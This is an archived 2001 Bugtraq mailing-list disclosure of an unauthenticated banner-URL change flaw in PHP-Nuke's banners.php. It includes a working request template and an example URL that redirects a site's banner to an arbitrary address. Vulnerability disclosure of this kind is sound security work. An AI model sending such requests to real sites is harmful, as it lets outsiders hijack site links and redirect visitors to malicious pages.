[20005] in bugtraq
Php-nuke exploit...
daemon@ATHENA.MIT.EDU (Juan Diego)
Tue Apr 3 17:25:55 2001
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.21.0104021524430.21403-100000@krusty.linuxcolombia.com.co>
Date: Mon, 2 Apr 2001 16:18:53 -0500
Reply-To: diego@LINUXCOLOMBIA.COM.CO
From: Juan Diego <diego@LINUXCOLOMBIA.COM.CO>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi people...
This went public today... there are a bug in the banner section of
php-nuke (http://www.phpnuke.org) which is web engine...
the problem is you can change the url banners form anywhere, to anywhere
example, to change the url of the first banner yo should enter un your
browser
http://target/banners.php?op=Change&bid=bannerid&url=http://where.to
if we want to change the banner number 1 to redir to www.you_are_redir we
write
http://www.foo.com/banners.php?op=Change&bid=1&url=http://you.are.redir
where www.foo.com is the server running php-nuke,
thats it...
Bye
Juan Diego
